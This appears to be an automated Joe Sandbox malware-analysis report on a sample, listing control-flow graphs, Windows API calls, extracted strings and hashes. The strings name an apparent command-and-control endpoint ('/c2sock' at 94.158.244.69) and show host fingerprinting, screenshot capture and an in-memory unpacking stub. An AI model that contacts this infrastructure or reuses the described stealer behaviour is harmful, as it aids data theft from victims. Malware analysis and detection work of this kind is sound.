                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrcat
                                                                    • String ID: (lu$)lu$)lu$n_v$n_v$n_v
                                                                    • API String ID: 4038537762-1534030094
                                                                    • Opcode ID: 072b878477c295eb77043ba653f905b2afdd85461ce88a646d5d7cd4a06fd790
                                                                    • Instruction ID: 4b57ba66ae2396d09571da8aec8c9542c80e7c55b9c92ca3ddc1ba6dd1b7a9a6
                                                                    • Opcode Fuzzy Hash: 072b878477c295eb77043ba653f905b2afdd85461ce88a646d5d7cd4a06fd790
                                                                    • Instruction Fuzzy Hash: 7AF11D71B0012E9BCF289F99E8515BEBAB4FB54310FE44537E401EA3B0D37989469B4B

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 5808 41a28f-41a2c9 call 447e24 call 44568a 5813 41a2cc-41a2d4 5808->5813 5814 41a341-41a346 5813->5814 5815 41a2d6-41a2db 5813->5815 5818 41a34c-41a351 5814->5818 5819 41a40e-41a413 5814->5819 5816 41a2e1-41a2e6 5815->5816 5817 41a3c5-41a3ca 5815->5817 5820 41a458-41a45d 5816->5820 5821 41a2ec-41a2f1 5816->5821 5822 41a3d0-41a3d5 5817->5822 5823 41a4f7-41a4fc 5817->5823 5824 41a357-41a35c 5818->5824 5825 41a4b8-41a4bd 5818->5825 5826 41a419-41a41e 5819->5826 5827 41a53a-41a53f 5819->5827 5830 41a463-41a468 5820->5830 5831 41a635-41a63a 5820->5831 5832 41a2f7-41a2fc 5821->5832 5833 41a578-41a57d 5821->5833 5836 41a5cb-41a5d0 5822->5836 5837 41a3db-41a3e0 5822->5837 5828 41a502-41a507 5823->5828 5829 41a6c9-41a6ce 5823->5829 5840 41a362-41a367 5824->5840 5841 41a5a5-41a5aa 5824->5841 5838 41a6a1-41a6a6 5825->5838 5839 41a4c3-41a4c8 5825->5839 5842 41a424-41a429 5826->5842 5843 41a5ed-41a5f2 5826->5843 5834 41a705-41a70a 5827->5834 5835 41a545-41a54a 5827->5835 5862 41a50d-41a512 5828->5862 5863 41a85f-41a866 5828->5863 5868 41a6d4-41a6d9 5829->5868 5869 41a99e-41a9a9 call 447e24 5829->5869 5848 41a7e7-41a7ee 5830->5848 5849 41a46e-41a473 5830->5849 5856 41a640-41a645 5831->5856 5857 41a97f-41a98d 5831->5857 5852 41a302-41a307 5832->5852 5853 41a727-41a735 5832->5853 5872 41a583-41a588 5833->5872 5873 41aa24-41aa2b 5833->5873 5874 41a9c0-41a9cb 5834->5874 5875 41a710-41a715 5834->5875 5866 41a550-41a555 5835->5866 5867 41a886-41a89c call 41941d call 419473 5835->5867 5850 41a936-41a94c 5836->5850 5851 41a5d6-41a5db 5836->5851 5870 41a797-41a7bf 5837->5870 5871 41a3e6-41a3eb 5837->5871 5864 41a992-41a999 5838->5864 5865 41a6ac-41a6b1 5838->5865 5858 41a80e-41a828 call 41c270 call 41f9a4 5839->5858 5859 41a4ce-41a4d3 5839->5859 5860 41a758-41a771 5840->5860 5861 41a36d-41a372 5840->5861 5846 41a5b0-41a5b5 5841->5846 5847 41a902-41a909 5841->5847 5844 41a7db-41a7e2 5842->5844 5845 41a42f-41a434 5842->5845 5854 41a951-41a970 5843->5854 5855 41a5f8-41a5fd 5843->5855 5844->5813 5877 41a9d7-41a9da 5845->5877 5878 41a43a-41a43f 5845->5878 5893 41a5bb-41a5c0 5846->5893 5894 41a90e-41a931 call 447e2f 5846->5894 5847->5813 5848->5813 5879 41a7f3-41a809 5849->5879 5880 41a479-41a47e 5849->5880 5850->5813 5896 41a5e1-41a5e8 5851->5896 5897 41aa30-41aa35 5851->5897 5898 41a73a-41a748 5852->5898 5899 41a30d-41a312 5852->5899 5853->5813 5882 41a977-41a97a 5854->5882 5895 41a972 5854->5895 5855->5813 5900 41a603-41a625 5855->5900 5856->5813 5904 41a64b call 41d057 5856->5904 5857->5813 5946 41a82d-41a834 5858->5946 5884 41a839-41a85a 5859->5884 5885 41a4d9-41a4de 5859->5885 5860->5813 5905 41a776-41a787 5861->5905 5906 41a378-41a37d 5861->5906 5886 41a518-41a51d 5862->5886 5887 41a86b-41a876 5862->5887 5863->5813 5864->5813 5865->5813 5907 41a6b7-41a6c4 5865->5907 5889 41a8b6-41a8e6 5866->5889 5890 41a55b-41a560 5866->5890 5948 41a8a1-41a8b1 5867->5948 5868->5813 5908 41a6df-41a700 call 41b251 5868->5908 5927 41a9ae-41a9bb 5869->5927 5881 41a7c5-41a7ca 5870->5881 5870->5882 5909 41a3f1-41a3f6 5871->5909 5910 41a7cf-41a7d6 5871->5910 5891 41a8f6-41a8fd 5872->5891 5892 41a58e-41a593 5872->5892 5873->5813 5902 41a9cd-41a9d5 5874->5902 5903 41a9ec-41aa15 5874->5903 5875->5813 5876 41a71b-41a722 5875->5876 5876->5813 5928 41a9db 5877->5928 5878->5813 5911 41a445-41a453 5878->5911 5879->5813 5880->5813 5914 41a484-41a4a8 call 41604a 5880->5914 5881->5882 5882->5813 5884->5813 5885->5813 5916 41a4e4-41a4f2 5885->5916 5886->5813 5917 41a523-41a526 call 447a80 5886->5917 5887->5882 5918 41a87c-41a881 5887->5918 5889->5882 5921 41a8ec-41a8f1 5889->5921 5890->5813 5920 41a566-41a573 5890->5920 5891->5813 5892->5813 5922 41a599-41a5a0 5892->5922 5893->5903 5924 41a5c6 5893->5924 5894->5813 5895->5882 5896->5813 5897->5813 5933 41aa3b-41aa48 5897->5933 5898->5882 5912 41a74e-41a753 5898->5912 5899->5813 5925 41a314-41a331 5899->5925 5900->5882 5926 41a62b-41a630 5900->5926 5902->5873 5902->5877 5930 41aa17 5903->5930 5931 41aa1c-41aa1f 5903->5931 5942 41a650-41a69c call 41aa49 * 3 5904->5942 5905->5882 5913 41a78d-41a792 5905->5913 5906->5813 5932 41a383-41a3b5 call 41592c call 41900a 5906->5932 5907->5813 5908->5813 5909->5813 5935 41a3fc-41a409 5909->5935 5910->5813 5911->5813 5912->5882 5913->5882 5914->5882 5951 41a4ae-41a4b3 5914->5951 5916->5813 5947 41a52b-41a535 5917->5947 5918->5882 5920->5813 5921->5882 5922->5813 5924->5813 5925->5882 5941 41a337-41a33c 5925->5941 5926->5882 5927->5813 5928->5928 5930->5931 5931->5813 5932->5882 5957 41a3bb-41a3c0 5932->5957 5935->5813 5941->5882 5942->5813 5946->5813 5947->5813 5948->5813 5951->5882 5957->5882
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _wctomb_s
                                                                    • String ID: /c2sock$94.158.244.69$GhYuIq$file$hwid$lid$pid
                                                                    • API String ID: 2865277502-1332857675
                                                                    • Opcode ID: eb0b6a858b081c0f0339ece4a3e91829cc041cf882a78251da46bd4ef4ec5e2d
                                                                    • Instruction ID: cc35308ceb474d8d45e9bf1619109491d7752d3a10985d79ac983763bc7ee506
                                                                    • Opcode Fuzzy Hash: eb0b6a858b081c0f0339ece4a3e91829cc041cf882a78251da46bd4ef4ec5e2d
                                                                    • Instruction Fuzzy Hash: 11F108B5D0211A9BDF248B88C8455FEBAB1AB14340F24496BE415F7394D33DCAE18B9F

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 6109 233003c-2330047 6110 2330049 6109->6110 6111 233004c-2330263 call 2330a3f call 2330e0f call 2330d90 VirtualAlloc 6109->6111 6110->6111 6126 2330265-2330289 call 2330a69 6111->6126 6127 233028b-2330292 6111->6127 6131 23302ce-23303c2 VirtualProtect call 2330cce call 2330ce7 6126->6131 6129 23302a1-23302b0 6127->6129 6130 23302b2-23302cc 6129->6130 6129->6131 6130->6129 6138 23303d1-23303e0 6131->6138 6139 23303e2-2330437 call 2330ce7 6138->6139 6140 2330439-23304b8 VirtualFree 6138->6140 6139->6138 6142 23305f4-23305fe 6140->6142 6143 23304be-23304cd 6140->6143 6144 2330604-233060d 6142->6144 6145 233077f-2330789 6142->6145 6147 23304d3-23304dd 6143->6147 6144->6145 6148 2330613-2330637 6144->6148 6150 23307a6-23307b0 6145->6150 6151 233078b-23307a3 6145->6151 6147->6142 6152 23304e3-2330505 LoadLibraryA 6147->6152 6157 233063e-2330648 6148->6157 6153 23307b6-23307cb 6150->6153 6154 233086e-23308be LoadLibraryA 6150->6154 6151->6150 6155 2330517-2330520 6152->6155 6156 2330507-2330515 6152->6156 6158 23307d2-23307d5 6153->6158 6165 23308c7-23308f9 6154->6165 6159 2330526-2330547 6155->6159 6156->6159 6157->6145 6160 233064e-233065a 6157->6160 6161 23307d7-23307e0 6158->6161 6162 2330824-2330833 6158->6162 6163 233054d-2330550 6159->6163 6160->6145 6164 2330660-233066a 6160->6164 6166 23307e2 6161->6166 6167 23307e4-2330822 6161->6167 6171 2330839-233083c 6162->6171 6168 23305e0-23305ef 6163->6168 6169 2330556-233056b 6163->6169 6170 233067a-2330689 6164->6170 6172 2330902-233091d 6165->6172 6173 23308fb-2330901 6165->6173 6166->6162 6167->6158 6168->6147 6174 233056f-233057a 6169->6174 6175 233056d 6169->6175 6176 2330750-233077a 6170->6176 6177 233068f-23306b2 6170->6177 6171->6154 6178 233083e-2330847 6171->6178 6173->6172 6180 233059b-23305bb 6174->6180 6181 233057c-2330599 6174->6181 6175->6168 6176->6157 6182 23306b4-23306ed 6177->6182 6183 23306ef-23306fc 6177->6183 6184 233084b-233086c 6178->6184 6185 2330849 6178->6185 6192 23305bd-23305db 6180->6192 6181->6192 6182->6183 6186 233074b 6183->6186 6187 23306fe-2330748 6183->6187 6184->6171 6185->6154 6186->6170 6187->6186 6192->6163
                                                                    APIs
                                                                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0233024D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3614139526.0000000002330000.00000040.00001000.00020000.00000000.sdmp, Offset: 02330000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2330000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocVirtual
                                                                    • String ID: cess$kernel32.dll
                                                                    • API String ID: 4275171209-1230238691
                                                                    • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                    • Instruction ID: 630cfdc9f68c4602c6f9e054d7463fb40ce5c3a582782d687d0597b05b959f97
                                                                    • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                    • Instruction Fuzzy Hash: 98526A75A01229DFDB65CF68C984BACBBB5BF09304F1480D9E94DAB351DB30AA85CF14

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 6334 432718-43272b 6335 43272e-432736 6334->6335 6336 432771-432776 6335->6336 6337 432738-43273d 6335->6337 6340 432821-432826 6336->6340 6341 43277c-432781 6336->6341 6338 432743-432748 6337->6338 6339 4327f0-4327f5 6337->6339 6342 432872-432877 6338->6342 6343 43274e-432753 6338->6343 6344 4327fb-432800 6339->6344 6345 4328e9-4328ee 6339->6345 6346 432910-432915 6340->6346 6347 43282c-432831 6340->6347 6348 432787-43278c 6341->6348 6349 4328a9-4328ae 6341->6349 6356 432a76-432a8d CreateCompatibleBitmap 6342->6356 6357 43287d-432882 6342->6357 6358 432979-43298f 6343->6358 6359 432759-43275e 6343->6359 6360 432806-43280b 6344->6360 6361 4329fc-432a09 6344->6361 6350 4328f4-4328f9 6345->6350 6351 432ace-432adf 6345->6351 6354 432ae4-432aeb 6346->6354 6355 43291b-432920 6346->6355 6364 432837-43283c 6347->6364 6365 432a26-432a52 BitBlt 6347->6365 6352 432792-432797 6348->6352 6353 4329d8-4329eb 6348->6353 6362 4328b0-4328b5 6349->6362 6363 4328d6-4328e4 6349->6363 6350->6335 6376 4328ff-43290b 6350->6376 6351->6335 6377 4329f0-4329f7 6352->6377 6378 43279d-4327a2 6352->6378 6353->6335 6354->6335 6355->6335 6379 432926-432934 6355->6379 6356->6335 6370 432a92-432abf call 4338b5 call 43350d 6357->6370 6371 432888-43288d 6357->6371 6358->6335 6372 432994-4329d3 call 430e6c * 2 6359->6372 6373 432764-432769 6359->6373 6380 432811-432816 6360->6380 6381 432a0e-432a21 SelectObject 6360->6381 6361->6335 6374 432af0-432af5 6362->6374 6375 4328bb-4328c6 6362->6375 6363->6335 6366 432842-432847 6364->6366 6367 432a5b-432a71 SelectObject 6364->6367 6368 432ac6-432ac9 6365->6368 6369 432a54-432a59 6365->6369 6366->6335 6382 43284d-432863 call 432b1b 6366->6382 6367->6335 6368->6335 6369->6368 6370->6368 6409 432ac1 6370->6409 6371->6335 6384 432893-4328a4 CreateCompatibleDC 6371->6384 6372->6335 6385 432943-432946 6373->6385 6386 43276f 6373->6386 6374->6335 6388 432afb-432b1a DeleteDC DeleteObject 6374->6388 6375->6385 6387 4328c8-4328d0 6375->6387 6376->6335 6377->6335 6378->6335 6389 4327a4-4327e0 call 4338b5 call 432718 6378->6389 6390 432936 6379->6390 6391 43293b-43293e 6379->6391 6393 43295b-432974 6380->6393 6394 43281c 6380->6394 6381->6335 6404 432865 6382->6404 6405 43286a-43286d 6382->6405 6384->6335 6398 432947 6385->6398 6386->6335 6387->6363 6387->6393 6389->6368 6411 4327e6-4327eb 6389->6411 6390->6391 6391->6368 6393->6335 6394->6335 6398->6398 6404->6405 6405->6368 6409->6368 6411->6368
                                                                    APIs
                                                                    • CreateCompatibleDC.GDI32(00000D62), ref: 00432894
                                                                    • DeleteDC.GDI32(00000002), ref: 00432B01
                                                                    • DeleteObject.GDI32(?), ref: 00432B0A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Delete$CompatibleCreateObject
                                                                    • String ID:
                                                                    • API String ID: 1022343127-0
                                                                    • Opcode ID: 9c86189b810d3e515d08f5d9a84ca5729e654e6d330d14ecc6a0223a2e2684ea
                                                                    • Instruction ID: 50fedbdf880eafc0b33480be7e0390951b775b57d16ab65b209ae7f2f2027e24
                                                                    • Opcode Fuzzy Hash: 9c86189b810d3e515d08f5d9a84ca5729e654e6d330d14ecc6a0223a2e2684ea
                                                                    • Instruction Fuzzy Hash: 358116B590031A9BDF209F948EC557E7A74BB0C350F282617E510F63A0D3FD9A419BAB

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 6412 44cf15-44cf21 6413 44cfb3-44cfb6 6412->6413 6414 44cf26-44cf37 6413->6414 6415 44cfbc 6413->6415 6417 44cf44-44cf5d LoadLibraryExW 6414->6417 6418 44cf39-44cf3c 6414->6418 6416 44cfbe-44cfc2 6415->6416 6419 44cfc3-44cfd3 6417->6419 6420 44cf5f-44cf68 GetLastError 6417->6420 6421 44cf42 6418->6421 6422 44cfdc-44cfde 6418->6422 6419->6422 6426 44cfd5-44cfd6 FreeLibrary 6419->6426 6424 44cfa1-44cfae 6420->6424 6425 44cf6a-44cf7c call 4516ce 6420->6425 6423 44cfb0 6421->6423 6422->6416 6423->6413 6424->6423 6425->6424 6429 44cf7e-44cf90 call 4516ce 6425->6429 6426->6422 6429->6424 6432 44cf92-44cf9f LoadLibraryExW 6429->6432 6432->6419 6432->6424
                                                                    APIs
                                                                    • FreeLibrary.KERNEL32(00000000,?,0044D022,?,00426F52,00000000,00000000,?,?,0044CDD6,00000021,FlsSetValue,0046503C,FlsSetValue,00000000), ref: 0044CFD6
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FreeLibrary
                                                                    • String ID: api-ms-$ext-ms-
                                                                    • API String ID: 3664257935-537541572
                                                                    • Opcode ID: 6740c229368fb351fb4ec7fc524e13049988398a7c5dabcb7bff3fed9ad9b5d0
                                                                    • Instruction ID: c6a9518bbc4403065455c8dc6532f837efe444071a0c6fa5154c8577c36c6d79
                                                                    • Opcode Fuzzy Hash: 6740c229368fb351fb4ec7fc524e13049988398a7c5dabcb7bff3fed9ad9b5d0
                                                                    • Instruction Fuzzy Hash: 4521EE31E47210ABEB219B65DCC0A5B77699B41764B190122FD05A73D0FBBCDD08C6DD

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 6676 44575f-445778 6678 44578d-44579d 6676->6678 6679 44577a-44578b call 4447a4 call 44e2f7 6676->6679 6681 4457b2-4457b8 6678->6681 6682 44579f-4457b0 call 4447a4 call 44e2f7 6678->6682 6701 4457e0-4457e2 6679->6701 6684 4457c0-4457c6 6681->6684 6685 4457ba 6681->6685 6703 4457df 6682->6703 6690 4457e3 call 453aae 6684->6690 6691 4457c8 6684->6691 6688 4457d2-4457dc call 4447a4 6685->6688 6689 4457bc-4457be 6685->6689 6704 4457de 6688->6704 6689->6684 6689->6688 6698 4457e8-4457fd call 453711 6690->6698 6691->6688 6695 4457ca-4457d0 6691->6695 6695->6688 6695->6690 6706 445803-44580f call 45373d 6698->6706 6707 4459ee-4459f8 call 44e307 6698->6707 6703->6701 6704->6703 6706->6707 6712 445815-445821 call 453769 6706->6712 6712->6707 6715 445827-44583c 6712->6715 6716 4458ac-4458b7 call 4537d0 6715->6716 6717 44583e 6715->6717 6716->6704 6724 4458bd-4458c8 6716->6724 6719 445840-445846 6717->6719 6720 445848-445864 call 4537d0 6717->6720 6719->6716 6719->6720 6720->6704 6725 44586a-44586d 6720->6725 6726 4458e4 6724->6726 6727 4458ca-4458d3 call 453a5a 6724->6727 6728 4459e7-4459e9 6725->6728 6729 445873-44587c call 453a5a 6725->6729 6730 4458e7-4458fb call 4543d0 6726->6730 6727->6726 6735 4458d5-4458e2 6727->6735 6728->6704 6729->6728 6738 445882-44589a call 4537d0 6729->6738 6739 4458fd-445905 6730->6739 6740 445908-44592f call 4527e0 call 4543d0 6730->6740 6735->6730 6738->6704 6745 4458a0-4458a7 6738->6745 6739->6740 6748 445931-44593a 6740->6748 6749 44593d-445964 call 4527e0 call 4543d0 6740->6749 6745->6728 6748->6749 6754 445966-44596f 6749->6754 6755 445972-445981 call 4527e0 6749->6755 6754->6755 6758 445983 6755->6758 6759 4459a9-4459c7 6755->6759 6760 445985-445987 6758->6760 6761 445989-44599d 6758->6761 6762 4459e4 6759->6762 6763 4459c9-4459e2 6759->6763 6760->6761 6764 44599f-4459a1 6760->6764 6761->6728 6762->6728 6763->6728 6764->6728 6765 4459a3 6764->6765 6765->6759 6766 4459a5-4459a7 6765->6766 6766->6728 6766->6759
                                                                    APIs
                                                                    • __allrem.LIBCMT ref: 004458F2
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0044590E
                                                                    • __allrem.LIBCMT ref: 00445925
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00445943
                                                                    • __allrem.LIBCMT ref: 0044595A
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00445978
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                    • String ID:
                                                                    • API String ID: 1992179935-0
                                                                    • Opcode ID: 6914c5dd9646aa3fd790727cf4e39c2290796d50bc97961f3513338c227282f2
                                                                    • Instruction ID: 558deed22b9213933cb6ee14014e535275a7d7dbd354c33e6b5693a62e892da8
                                                                    • Opcode Fuzzy Hash: 6914c5dd9646aa3fd790727cf4e39c2290796d50bc97961f3513338c227282f2
                                                                    • Instruction Fuzzy Hash: 0681D8B1600B06DBFB20AE29CC42B5BB3E9AF54768F24452FE411D67C3E778D9058B58
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 9a%^$M%$Screen.png
                                                                    • API String ID: 0-2021954137
                                                                    • Opcode ID: 7ea333df6f5c2910ca2bc4c4f4777871bdb5a703dffbbcdfcf0a34b6d9d0a0f5
                                                                    • Instruction ID: 11fefa64aaa65e2afc3480572e0d96af9cd0f56f536a59b59af3bc8bd9e58722
                                                                    • Opcode Fuzzy Hash: 7ea333df6f5c2910ca2bc4c4f4777871bdb5a703dffbbcdfcf0a34b6d9d0a0f5
                                                                    • Instruction Fuzzy Hash: 4691D8B6E005098ADF248E98888557EB6B4AB9C312F647917E416FB390E37CCF41875B
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00402FE0
                                                                    • LoadLibraryA.KERNELBASE(my-global-render.dll), ref: 00402FEA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: LibraryLoad
                                                                    • String ID: advapi32.dll$my-global-render.dll
                                                                    • API String ID: 1029625771-772900288
                                                                    • Opcode ID: 925eec738fb8ed2f48ee2fb466019044b8b010c49f75685c643bb3b93b1091e7
                                                                    • Instruction ID: f2405b5e0aceb9a51e137d87bf907524102569514c3531be8be57496d61f3bc2
                                                                    • Opcode Fuzzy Hash: 925eec738fb8ed2f48ee2fb466019044b8b010c49f75685c643bb3b93b1091e7
                                                                    • Instruction Fuzzy Hash: 6BA1F872D0412A86CF64CE98994527E6E78BB10351F250A3BE915FA3D0C7BCCF41A79B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ^^4$^^4$~rjz
                                                                    • API String ID: 0-2511145224
                                                                    • Opcode ID: e0c7894fc243b6b43147b7a10468ae5ae2dedb06c2c8e31032a7761496933ed1
                                                                    • Instruction ID: fe384b451c266d20576388885646b2b98754c57df49fd09348afa64f247ec54d
                                                                    • Opcode Fuzzy Hash: e0c7894fc243b6b43147b7a10468ae5ae2dedb06c2c8e31032a7761496933ed1
                                                                    • Instruction Fuzzy Hash: 9E618C72E0011947EF287D4888855BEB7919B88B1AF342927F115FB391C76C8F4D974B
                                                                    APIs
                                                                    • GetTimeZoneInformation.KERNELBASE(00000000,00000000,00000000,00454058,004170BE,?), ref: 00453C36
                                                                      • Part of subcall function 00453203: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,0045769E,?,00000000,-00000008), ref: 004532AF
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ByteCharInformationMultiTimeWideZone
                                                                    • String ID: Eastern Standard Time$Eastern Summer Time
                                                                    • API String ID: 1123094072-239921721
                                                                    • Opcode ID: caf58cafb60ec3060b2a5cf257d1c9c7a73c601415e76bdfbbd359845a8db1e6
                                                                    • Instruction ID: af1a61733d26d89116c9bb65ccd9636383a7b5e966e3c510a6c9de8ec0de26fa
                                                                    • Opcode Fuzzy Hash: caf58cafb60ec3060b2a5cf257d1c9c7a73c601415e76bdfbbd359845a8db1e6
                                                                    • Instruction Fuzzy Hash: FC4199B2D00115BBDB106FA6DC46A5ABF78EF04396F10406BFD04A7162E7789F148B99
                                                                    APIs
                                                                    • GetCurrentProcess.KERNEL32(0044387B,?,00443A9B,00000000,?,?,0044387B,8F497764,?,0044387B), ref: 004439CB
                                                                    • TerminateProcess.KERNEL32(00000000,?,00443A9B,00000000,?,?,0044387B,8F497764,?,0044387B), ref: 004439D2
                                                                    • ExitProcess.KERNEL32 ref: 004439E4
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Process$CurrentExitTerminate
                                                                    • String ID:
                                                                    • API String ID: 1703294689-0
                                                                    • Opcode ID: 781b962f5f028f3a025d91418773fc66c46a7b9eca303b4a2ef1248f55b92173
                                                                    • Instruction ID: af00403c123718aebf8df8255158ed5eb80799a0d3dec5c869f97e29736db2e2
                                                                    • Opcode Fuzzy Hash: 781b962f5f028f3a025d91418773fc66c46a7b9eca303b4a2ef1248f55b92173
                                                                    • Instruction Fuzzy Hash: 7ED09E71404115BBEF113F61DC0E9593F2AAF40787B144029F90596132DFF59E51DB99
                                                                    APIs
                                                                    • GetCurrentHwProfileA.ADVAPI32(00000000,?,?,0041A650), ref: 0041D07D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CurrentProfile
                                                                    • String ID: advapi32.dll
                                                                    • API String ID: 2104809126-4050573280
                                                                    • Opcode ID: 47e41008aad65778580e0c35056873463c47f4eed791b1223cc5fbeb135fea17
                                                                    • Instruction ID: 6db1735cda00ed3d220bfaf1cacc4b3e5e01bff1461a9ef13bbd23f8b442f0e3
                                                                    • Opcode Fuzzy Hash: 47e41008aad65778580e0c35056873463c47f4eed791b1223cc5fbeb135fea17
                                                                    • Instruction Fuzzy Hash: 9BF0E9F3D4013126F61025AA5C01ABB7E888B46729F140177FD0CE6281E21E9D8242EA
                                                                    APIs
                                                                    • RtlFreeHeap.NTDLL(00000000,00000000,?,00447A98,00426F52,?,?), ref: 0044E23A
                                                                    • GetLastError.KERNEL32(?,?,00447A98,00426F52,?,?), ref: 0044E245
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ErrorFreeHeapLast
                                                                    • String ID:
                                                                    • API String ID: 485612231-0
                                                                    • Opcode ID: 5ab3d534c7926ab7bd1f653ef6df7c72235af480dfd0cba9c2c881dd6ec4968b
                                                                    • Instruction ID: f015b3b87cbc766378ce5f0d68a15eb43446f93644205f51174f0ce78f182e30
                                                                    • Opcode Fuzzy Hash: 5ab3d534c7926ab7bd1f653ef6df7c72235af480dfd0cba9c2c881dd6ec4968b
                                                                    • Instruction Fuzzy Hash: 3AE08631100214ABEF112BA2AD0AB5A3B9CBF80355F104065F60896161EBB88850C7DD
                                                                    APIs
                                                                    • SetErrorMode.KERNELBASE(00000400,?,?,02330223,?,?), ref: 02330E19
                                                                    • SetErrorMode.KERNELBASE(00000000,?,?,02330223,?,?), ref: 02330E1E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3614139526.0000000002330000.00000040.00001000.00020000.00000000.sdmp, Offset: 02330000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2330000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ErrorMode
                                                                    • String ID:
                                                                    • API String ID: 2340568224-0
                                                                    • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                    • Instruction ID: 14945b82f04acc9c5ca6033de40102e9104dd1cbd9b006f498a6056a38369535
                                                                    • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
